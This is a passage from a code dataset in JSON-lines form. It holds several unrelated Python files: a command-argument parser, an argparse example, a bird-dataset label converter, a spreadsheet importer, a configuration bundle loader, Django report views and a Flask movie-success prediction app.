namedtuple('ArgumentValue', 'value operator')\n\n\ndef _parse_named_argument(arg):\n groups = _param_re.fullmatch(arg).groups()\n name = groups[1]\n operator = groups[2]\n values = [value[1:-1] if _param_string_re.fullmatch(value) else value for value in\n _param_argument_re.findall(groups[3])]\n return NamedArgument(name, operator, values)\n\n\ndef parse_arguments(arg):\n arg = arg.lower()\n named_arguments_parsed = [_parse_named_argument(na[0]) for na in _param_re.findall(arg)]\n arg = _param_re.sub('', arg)\n # Technically, the order (named arguments then tags)\n # matters because otherwise a fake tag could appear as a value to a named argument\n tags = [t[1:] for t in _tag_re.findall(arg)]\n arg = _tag_re.sub('', arg)\n named_arguments = {}\n for na in named_arguments_parsed:\n if na.name not in named_arguments:\n named_arguments[na.name] = []\n named_arguments[na.name].append(ArgumentValue(na.value, na.operator))\n return ParsedArguments(arg.strip(), set(tags), named_arguments)\n\n\nclass ArgumentError(Exception):\n pass\n\n\nclass ParsedArguments:\n text_argument: str\n word_arguments: Set[str]\n tag_arguments: Set[str]\n named_arguments: Dict[str, List[ArgumentValue]]\n\n def __init__(self, text: str, tags: Set[str], named_arguments: Dict[str, List[ArgumentValue]]):\n self.text_argument = text\n self.word_arguments = set(text.split())\n self.tag_arguments = tags\n self.named_arguments = named_arguments\n self.used_named_arguments = set()\n self.used_tags = set()\n self.used_words = set()\n\n def word(self, value: str):\n if value in self.word_arguments:\n self.used_words.add(value)\n return True\n return False\n\n def words(self, values: Optional[Iterable[str]] = None, aliases: Optional[Dict[str, str]] = None):\n results = set()\n if values is not None:\n for value in values:\n if value in self.word_arguments:\n results.add(value)\n self.used_words.add(value)\n if aliases is not None:\n for alias, value in aliases.items():\n if alias in self.word_arguments:\n results.add(value)\n self.used_words.add(alias)\n return results\n\n def text(self):\n return ' '.join(word for word in self.text_argument.split() if word not in self.used_words)\n\n def tag(self, name: str):\n if name in self.tag_arguments:\n self.used_tags.add(name)\n return True\n return False\n\n def tags(self, names: Optional[Iterable[str]] = None, aliases: Optional[Dict[str, str]] = None):\n results = set()\n if names is not None:\n for name in names:\n if name in self.tag_arguments:\n results.add(name)\n self.used_tags.add(name)\n if aliases is not None:\n for alias, value in aliases.items():\n if alias in self.tag_arguments:\n results.add(value)\n self.used_tags.add(alias)\n return results\n\n def has_named(self, name: str):\n return name in self.named_arguments\n\n def single(self, names: Union[List[str], str], default: Any = None, allowed_operators: Optional[Container] = None,\n is_list=False, numeric=False, converter: Union[dict, Callable] = lambda n: n):\n if allowed_operators is None:\n allowed_operators = {'>', '<', '>=', '<=', '!=', '==', '='}\n if not isinstance(default, tuple):\n default = ArgumentValue(default, '=')\n if not isinstance(names, list):\n names = [names]\n for name in names:\n self.used_named_arguments.add(name)\n name = f'{names[0]} ({\", \".join(names[1:])})' if len(names) > 1 else names[0]\n value = [arg for args in (self.named_arguments.get(name) for name in names) if args for arg in args]\n if not value:\n return default\n if len(value) != 1:\n raise ArgumentError(f'Expected only one value for parameter \"{name}\".')\n value = value[0]\n if value.operator not in allowed_operators:\n raise ArgumentError(\n f'Allowed operators for parameter \"{name}\" are {\", \".join(str(o) for o in allowed_operators)}.')\n if numeric:\n try:\n value = ArgumentValue([float(v) for v in value.value], value.operator)\n except ValueError:\n raise ArgumentError(f'Expected numerical arguments for parameter \"{name}\".')\n try:\n if isinstance(converter, dict):\n value = ArgumentValue([converter[v] for v in value.value], value.operator)\n else:\n value = ArgumentValue([converter(v) for v in value.value], value.operator)\n except Exception:\n raise ArgumentError(f'Invalid value for parameter \"{name}\".')\n if not is_list:\n if len(value.value) != 1:\n raise ArgumentError(f'List not allowed for parameter \"{name}\".')\n value = ArgumentValue(value.value[0], value.operator)\n return value\n\n def repeatable(self, names: Union[List[str], str], default: Any = None,\n allowed_operators: Optional[Container] = None,\n is_list=False, numeric=False, converter: Union[dict, Callable] = lambda n: n):\n if allowed_operators is None:\n allowed_operators = {'>', '<', '>=', '<=', '!=', '==', '='}\n if not isinstance(default, tuple) and default is not None:\n default = [ArgumentValue(default, '=')]\n if default is None:\n default = []\n if not isinstance(names, list):\n names = [names]\n for name in names:\n self.used_named_arguments.add(name)\n name = f'{names[0]} ({\", \".join(names[1:])})' if len(names) > 1 else names[0]\n values = [arg for args in (self.named_arguments.get(name) for name in names) if args for arg in args]\n if not values:\n return default\n if any(value.operator not in allowed_operators for value in values):\n raise ArgumentError(\n f'Allowed operators for parameter \"{name}\" are {\", \".join(str(o) for o in allowed_operators)}.')\n if numeric:\n try:\n values = [ArgumentValue([float(v) for v in value.value], value.operator) for value in values]\n except ValueError:\n raise ArgumentError(f'Expected numerical arguments for parameter \"{name}\".')\n try:\n if isinstance(converter, dict):\n values = [ArgumentValue([converter[v] for v in value.value], value.operator) for value in values]\n else:\n values = [ArgumentValue([converter(v) for v in value.value], value.operator) for value in values]\n except Exception:\n raise ArgumentError(f'Invalid value for parameter \"{name}\".')\n if not is_list:\n if any(len(value.value) != 1 for value in values):\n raise ArgumentError(f'List not allowed for parameter \"{name}\".')\n values = [ArgumentValue(value.value[0], value.operator) for value in values]\n return values\n\n def has_unused(self):\n return self.has_unused_named_arguments() or self.has_unused_tags()\n\n def has_unused_named_arguments(self):\n return any(name not in self.used_named_arguments for name in self.named_arguments.keys())\n\n def has_unused_tags(self):\n return any(t not in self.used_tags for t in self.tag_arguments)\n\n def require_all_arguments_used(self):\n def quote(s):\n return f'\"{s}\"'\n\n if self.has_unused_named_arguments():\n raise ArgumentError(\n f'Unknown arguments with names {\", \".join(quote(v) for v in self.named_arguments.keys() if v not in self.used_named_arguments)}.')\n if self.has_unused_tags():\n raise ArgumentError(\n f'Unknown tags {\", \".join(quote(v) for v in self.tag_arguments if v not in self.used_tags)}.')\n\n\n_operators = {\n '=': lambda a, b: a == b,\n '==': lambda a, b: a == b,\n '!=': lambda a, b: a != b,\n '>': lambda a, b: a > b,\n '<': lambda a, b: a < b,\n '>=': lambda a, b: a >= b,\n '<=': lambda a, b: a <= b,\n}\n\n_list_operators = {\n '=': lambda a, b: any(a == v for v in b),\n '==': lambda a, b: all(a == v for v in b),\n '!=': lambda a, b: all(a != v for v in b),\n '>': lambda a, b: all(a > v for v in b),\n '<': lambda a, b: all(a < v for v in b),\n '>=': lambda a, b: all(a >= v for v in b),\n '<=': lambda a, b: all(a <= v for v in b),\n}\n\n\ndef operator_for(operator: str):\n return _operators[operator]\n\n\ndef list_operator_for(operator: str):\n return _list_operators[operator]\n", "sub_path": "miyu_bot/commands/common/argument_parsing.py", "file_name": "argument_parsing.py", "file_ext": "py", "file_size_in_byte": 9938, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.compile", "line_number": 10, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 14, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 18, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 20, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Container", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Container", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 154, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "549971208", "text": "\n# from: https://stackoverflow.com/questions/17909294/python-argparse-mutual-exclusive-group\n\nimport argparse\n\n\nif __name__ == '__main__':\n # create the top-level parser\n parser = argparse.ArgumentParser(prog='PROG')\n parser.add_argument('--foo', action='store_true', help='help for foo arg.')\n subparsers = parser.add_subparsers(help='help for subcommand')\n\n # create the parser for the \"command_1\" command\n parser_a = subparsers.add_parser('command_1', help='command_1 help')\n parser_a.add_argument('a', type=str, help='help for bar, positional')\n\n # create the parser for the \"command_2\" command\n parser_b = subparsers.add_parser('command_2', help='help for command_2')\n parser_b.add_argument('-b', type=str, help='help for b')\n parser_b.add_argument('-c', type=str, action='store', default='', help='test')", "sub_path": "playground/argparse_test.py", "file_name": "argparse_test.py", "file_ext": "py", "file_size_in_byte": 843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "498921569", "text": "import pickle\nimport json\nimport os\nimport errno\n\n\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef label2matrix(label):\n labellist = [0] * 312\n for i in label:\n index = int(i)\n labellist[index - 1] = 1\n\n return labellist\n\n\ndef load_imagelist(file_path):\n # image id from 1 to 11788\n image_list = []\n for line in open(file_path):\n line = line.split()\n image_id = line[0]\n file_path = line[1]\n image_dict = {'image_id': image_id, 'file': file_path}\n image_list.append(image_dict)\n return image_list\n\n\ndef load_attributelist(file_path):\n # attribute id from 1 to 312\n attribute_list = []\n for line in open(file_path):\n line = line.split()\n attribute_id = line[0]\n attribute_name = line[1]\n attribute_dict = {'attribute_id': attribute_id, 'attribute_name': attribute_name}\n attribute_list.append(attribute_dict)\n return attribute_list\n\n\ndef load_attributelabels(file_path, attribute_list, image_list):\n dictlist = []\n flag = 0\n for line in open(file_path):\n line = line.split()\n image_id = line[0]\n attribute_id = line[1]\n is_present = line[2]\n attribute_name = attribute_list[int(attribute_id) - 1].get('attribute_name')\n if flag != image_id:\n attribute_temp = []\n flag = image_id\n image_file = image_list[int(flag) - 1].get('file')\n image_file = '/data/image_server/images/CUB/' + image_file\n if is_present == '1':\n attribute_name = attribute_name + '_yes'\n else:\n attribute_name = attribute_name + '_no'\n attribute_temp.append(attribute_name)\n datum = {'image_file': image_file, 'id': attribute_temp}\n dictlist.append(datum)\n else:\n if is_present == '1':\n attribute_name = attribute_name + '_yes'\n else:\n attribute_name = attribute_name + '_no'\n attribute_temp.append(attribute_name)\n return dictlist\n\n\ndef write_data(filepath, attribute_labels):\n f = open(filepath, 'w')\n for item in attribute_labels:\n item = json.dumps(item)\n f.write(item)\n f.write('\\n')\n f.close()\n\n\ndef write_label(filepath, attribute_list):\n f = open(filepath, 'w')\n for item in attribute_list:\n attribute_name = item['attribute_name']\n f.writelines([str(2), ';', str(attribute_name), ';', str(attribute_name), '\\n'])\n attribute_value = item['attribute_name']\n f.writelines([str(attribute_value), '_yes', ';', str(attribute_value), '_yes', '\\n'])\n f.writelines([str(attribute_value), '_no', ';', str(attribute_value), '_no', '\\n'])\n\n\nif __name__ == '__main__':\n attributelist = load_attributelist('attributes.txt')\n imagelist = load_imagelist('images.txt')\n labellist = load_attributelabels('image_attribute_labels.txt', attributelist, imagelist)\n write_data('data.txt', labellist)\n write_label('labels.txt', attributelist)\n", "sub_path": "util/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 3217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "errno.EEXIST", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "4486989", "text": "from django.apps import registry\nfrom QYManufacture import models as mo\nAPPCONFIG = registry.apps.get_app_config('QYManufacture')\nimport openpyxl\n\n\n\ndef xlsx_parse(bfp, pID=0):\n \"\"\"解析用户上传的xlsx文件。本函数只负责\n\n Args:\n bfp (fp):从POST域中读取到的内存文件\n\n Kwargs:\n pID (int):组件关联项目的ID\n\n Returns:\n dict. 未经检查的序列化数据 \n\n \"\"\"\n\n path = ''\n head = ['productClass', 'sizeNote', '', 'dupilicationNo',\n '', '', 'note', 'systemNote', 'batch']\n out = []\n with open(APPCONFIG.TEMP_PATH+\"/.temp.xlsx\", \"wb\") as fp:\n for chunk in bfp.chunks():\n fp.write(chunk)\n path = fp.name\n\n ws = openpyxl.load_workbook(path).active\n for row in ws.iter_rows(min_row=2, max_col=9):\n data = [x.value for x in row]\n data = dict(zip(head, data))\n data[\"drawings\"] = None\n data['project'] = pID\n data['status'] = mo.Components.CREATED\n data.pop('')\n out.append(data)\n return out\n", "sub_path": "QYmaintenance/QYManufacture/backEndScript/conponentCSVparser.py", "file_name": "conponentCSVparser.py", "file_ext": "py", "file_size_in_byte": 1058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.apps.registry.apps.get_app_config", "line_number": 3, "usage_type": "call"}, {"api_name": "django.apps.registry.apps", "line_number": 3, "usage_type": "attribute"}, {"api_name": "django.apps.registry", "line_number": 3, "usage_type": "name"}, {"api_name": "openpyxl.load_workbook", "line_number": 31, "usage_type": "call"}, {"api_name": "QYManufacture.models.Components", "line_number": 37, "usage_type": "attribute"}, {"api_name": "QYManufacture.models", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "365000871", "text": "from imp import find_module, load_module\nfrom logging import getLogger\n\nfrom . import settings\nfrom .clients import get_bundles\nfrom .exceptions import BundleError\nfrom .plugins import CONFIG_ITEM_CLASSES, load_plugins\n\nLOG = getLogger(__name__)\n\nclass AbstractConfiguration(object):\n \"\"\"\n Represents everything we know about the system we're dealing with.\n \"\"\"\n def __init__(self, node, metadata):\n self.bundles = []\n for group in metadata.groups:\n self.bundles += get_bundles(group)\n LOG.debug(\"got bundles for {}: {}\".format(\n node.metadata.name,\n \", \".join(self.bundles),\n ))\n \n self.config_items = {}\n load_plugins()\n \n bundle_modules = []\n for bundle_name in self.bundles:\n try:\n (f, pathname, description) = find_module(\n bundle_name,\n [settings.BUNDLE_PATH],\n )\n except ImportError:\n LOG.error(\"loading bundle failed: {}\".format(bundle_name))\n raise\n try:\n module = load_module(bundle_name, f, pathname, description)\n bundle_modules.append(module)\n LOG.debug(\"loaded bundle: \" + bundle_name)\n finally:\n f.close()\n \n for bundle_attribute, config_item in CONFIG_ITEM_CLASSES.items():\n self.config_items[bundle_attribute] = {}\n \n for bundle_module in bundle_modules:\n if not hasattr(bundle_module, bundle_attribute):\n LOG.debug(\"no {} found on bundle {}\".format(\n bundle_attribute,\n bundle_module,\n ))\n continue\n config_item_dict = getattr(bundle_module, bundle_attribute)\n \n if not isinstance(config_item_dict, dict):\n msg = \"'{}' attribute in bundle {} \" + \\\n \"is not a dictionary\".format(\n bundle_attribute,\n bundle_module,\n )\n LOG.error(msg)\n raise BundleError(msg)\n \n for name, abstract_info in config_item_dict.items():\n LOG.debug(\"found config item '{}:{}' \"\n \"in bundle {}\".format(\n config_item.__name__,\n name,\n bundle_module,\n ))\n \n config_item.validate_abstract_input_full(name, abstract_info)\n \n self.config_items[bundle_attribute][name] = abstract_info\n", "sub_path": "src/blockwart/abstract.py", "file_name": "abstract.py", "file_ext": "py", "file_size_in_byte": 2805, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "clients.get_bundles", "line_number": 18, "usage_type": "call"}, {"api_name": "plugins.load_plugins", "line_number": 25, "usage_type": "call"}, {"api_name": "imp.find_module", "line_number": 30, "usage_type": "call"}, {"api_name": "imp.load_module", "line_number": 38, "usage_type": "call"}, {"api_name": "plugins.CONFIG_ITEM_CLASSES.items", "line_number": 44, "usage_type": "call"}, {"api_name": "plugins.CONFIG_ITEM_CLASSES", "line_number": 44, "usage_type": "name"}, {"api_name": "exceptions.BundleError", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "374245240", "text": "import os\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom projects.models import Project, ProjectLog\nfrom .forms import ReportGeneratorForm\nfrom .models import Report, ReportGenerator\nfrom django.db.models import Q\nfrom .helpers import get_visualiser_file\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n@login_required(login_url='/accounts/login')\ndef index(request, user, project):\n template = 'reports_list.html'\n\n project = Project.objects.filter(slug=project).first()\n reports = ReportGenerator.objects.filter(project=project).order_by('-created_at')\n\n return render(request, template, locals())\n\n\n@login_required(login_url='/accounts/login')\ndef add(request, user, project):\n project = Project.objects.filter(slug=project).first()\n\n url = 'http://{}-file-controller/reports'.format(project.slug)\n import requests\n report_generators = []\n try:\n response = requests.get(url)\n if response.status_code == 200 or response.status_code == 203:\n payload = response.json()\n if payload['status'] == 'OK':\n for file in payload['generators']:\n report_generators.append(file['name'])\n except Exception as e:\n logger.error(\"Failed to get response from {} with error: {}\".format(url, e))\n\n if request.method == 'POST':\n form = ReportGeneratorForm(request.POST)\n\n if form.is_valid():\n obj = form.save()\n\n l = ProjectLog(project=project, module='RE', headline='Metrics',\n description='A new Generator {id} has been added'.format(id=obj.pk))\n l.save()\n\n get_visualiser_file(project.pk, obj.visualiser)\n\n url = '/{}/{}/reports/{}'.format(request.user, project.slug, obj.pk)\n else:\n url = '/{}/{}/reports/'.format(request.user, project.slug)\n\n return HttpResponseRedirect(url)\n else:\n form = ReportGeneratorForm({'project': project.id})\n\n return render(request, 'reports_add.html', locals())\n\n\n@login_required(login_url='/accounts/login')\ndef details(request, user, project, id):\n template = 'reports_details_generator.html'\n\n project = Project.objects.filter(slug=project).first()\n report = ReportGenerator.objects.filter(id=id).first()\n\n return render(request, template, locals())\n\n\n@login_required(login_url='/accounts/login')\ndef visualize_report(request, user, project, id):\n template = 'reports_details.html'\n\n project = Project.objects.filter(slug=project).first()\n report = Report.objects.filter(id=id).first()\n\n filename = 'report_{}.png'.format(id)\n\n reports_compare = Report.objects.filter(~Q(id=id))\n\n return render(request, template, locals())\n\n\ndef visualize_report_public(request, id):\n template = 'reports_details_public.html'\n\n report = Report.objects.filter(pk=id).first()\n\n filename = 'report_{}.png'.format(id)\n\n reports_compare = Report.objects.filter(~Q(id=id))\n\n return render(request, template, locals())\n\n\n@login_required(login_url='/accounts/login')\ndef delete_generator(request, user, project, id):\n project = Project.objects.filter(slug=project).first()\n report = ReportGenerator.objects.filter(id=id).first()\n\n path = 'reports/{}'.format(report.visualiser)\n\n if request.method == \"POST\":\n if os.path.exists(path):\n os.unlink(path)\n\n l = ProjectLog(project=project, module='RE', headline='Metrics',\n description='Generator {id} has been removed'.format(id=report.pk))\n l.save()\n\n report.delete()\n\n return HttpResponseRedirect('/{}/{}/reports/'.format(request.user, project.slug))\n\n return render(request, 'report_confirm_delete.html', locals())\n\n\n@login_required(login_url='/accounts/login')\ndef delete_report(request, user, project, id):\n project = Project.objects.filter(slug=project).first()\n report = Report.objects.filter(id=id).first()\n\n path = 'reports/report_{}.png'.format(id)\n\n if request.method == \"POST\":\n if os.path.exists(path):\n os.unlink(path)\n\n l = ProjectLog(project=project, module='RE', headline='Metrics',\n description='Metrics {id} has been removed'.format(id=report.pk))\n l.save()\n\n report.delete()\n\n return HttpResponseRedirect('/{}/{}/models/'.format(request.user, project.slug))\n\n return render(request, 'report_confirm_delete.html', locals())\n", "sub_path": "components/studio/reports/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4541, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 19, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 19, "usage_type": "name"}, {"api_name": "models.ReportGenerator.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "models.ReportGenerator.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.ReportGenerator", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 15, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 27, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 27, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "forms.ReportGeneratorForm", "line_number": 43, "usage_type": "call"}, {"api_name": "projects.models.ProjectLog", "line_number": 48, "usage_type": "call"}, {"api_name": "helpers.get_visualiser_file", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": "call"}, {"api_name": "forms.ReportGeneratorForm", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 25, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 69, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 69, "usage_type": "name"}, {"api_name": "models.ReportGenerator.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "models.ReportGenerator.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "models.ReportGenerator", "line_number": 70, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 72, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 65, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 79, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 79, "usage_type": "name"}, {"api_name": "models.Report.objects.filter", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 80, "usage_type": "name"}, {"api_name": "models.Report.objects.filter", "line_number": 84, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 84, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 86, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 75, "usage_type": "call"}, {"api_name": "models.Report.objects.filter", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 92, "usage_type": "name"}, {"api_name": "models.Report.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 96, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 96, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 98, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 103, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 103, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 103, "usage_type": "name"}, {"api_name": "models.ReportGenerator.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "models.ReportGenerator.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.ReportGenerator", "line_number": 104, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 110, "usage_type": "call"}, {"api_name": "projects.models.ProjectLog", "line_number": 112, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 118, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 101, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 125, "usage_type": "name"}, {"api_name": "models.Report.objects.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Report.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Report", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 132, "usage_type": "call"}, {"api_name": "projects.models.ProjectLog", "line_number": 134, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 140, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 142, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "551916446", "text": "from flask import Flask, render_template, url_for, request, jsonify\nfrom flask_material import Material \nimport simplejson as json\nimport pandas as pd \nimport numpy as np \nfrom joblib import dump, load\nimport keras\nfrom keras import backend as K\nimport tensorflow as tf\nfrom sklearn.preprocessing import StandardScaler,MinMaxScaler\n\n\n\napp = Flask(__name__, template_folder=\"templates\")\nMaterial(app)\n\nmodel = None\ngraph = None\n\ndef load_model():\n global model\n global graph\n model = tf.keras.models.load_model(\"data/movie_model_trained_log.h5\")\n graph = tf.get_default_graph()\n\nload_model()\n\nfile = \"data/movies.csv\"\ndf = pd.read_csv(file)\n\nyears = {\n 2016 : 1,\n 2017 : 2, \n 2018 : 3\n}\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route(\"/movies_api\")\ndef movies_api():\n data = json.loads(df.to_json(orient='records'))\n return jsonify(data)\n\n@app.route(\"/released_year/\")\ndef released_year(year):\n selected_yr = df.loc[df[\"year\"] == int(year)]\n year_df = json.loads(selected_yr.to_json(orient='records'))\n return jsonify(year_df)\n\n@app.route(\"/select_year\")\ndef select_year():\n return (jsonify(list(years)))\n\n@app.route('/analyze', methods=['POST','GET'])\ndef analyze():\n dd = {\"success\": False}\n\n if request.method == 'POST':\n input_budget = int(request.form[\"budget\"])\n input_comment = int(request.form[\"comment\"])\n input_view = float(request.form[\"view\"])\n input_like = int(request.form[\"like\"])\n input_likep=input_like/input_view\n input_commentp=input_comment/input_view\n\n data=[]\n data.append(np.log(input_budget*1000000))\n data.append(np.log(input_comment*1000000))\n data.append(np.log(input_view*1000))\n data.append(np.log(input_like*1000))\n # data.append(input_likep)\n # data.append(input_commentp)\n sc=load('data/std_scaler - log.bin')\n\n with graph.as_default():\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(tf.tables_initializer())\n a = model.predict_classes(sc.transform(np.array(data).reshape(-1,1).T))\n bb = model.predict(sc.transform(np.array(data).reshape(-1,1).T))\n print(a)\n dd[\"prediction\"] = str(a[0])\n predict=str(a[0])\n dd[\"success\"] = True\n z=f\"{(round(bb[0][0]*100,4))}%\"\n y=f\"{(round(bb[0][1]*100,4))}%\"\n\n return render_template('index.html', input_budget=input_budget, input_comment=input_comment, input_view=input_view, input_like=input_like, predict=predict, z=z, y=y)\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2720, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_material.Material", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 39, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 55, "usage_type": "call"}, {"api_name": 